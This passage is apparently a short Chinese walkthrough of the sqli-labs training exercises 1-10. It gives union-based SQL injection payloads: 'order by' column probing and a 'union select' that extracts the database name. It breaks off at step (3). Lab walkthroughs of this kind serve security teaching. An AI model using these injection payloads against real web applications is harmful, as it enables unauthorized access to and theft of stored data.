sql注入1-10題

sql注入 Less-1-10題 首先輸入?id=1觀察頁面,發現能登陸, 使用聯合注入 (1) 查找幾個字段(需輸入錯誤id) ?id=0‘ order by 3–+頁面正常 輸入?id=0‘ order by 4–+頁面錯誤,說明有三個字段 (2) 爆數據庫名 ?id=0’ union select 1,(select database()),3–+ 爆出數據庫名 security。 (3)
相關文章
相關標籤/搜索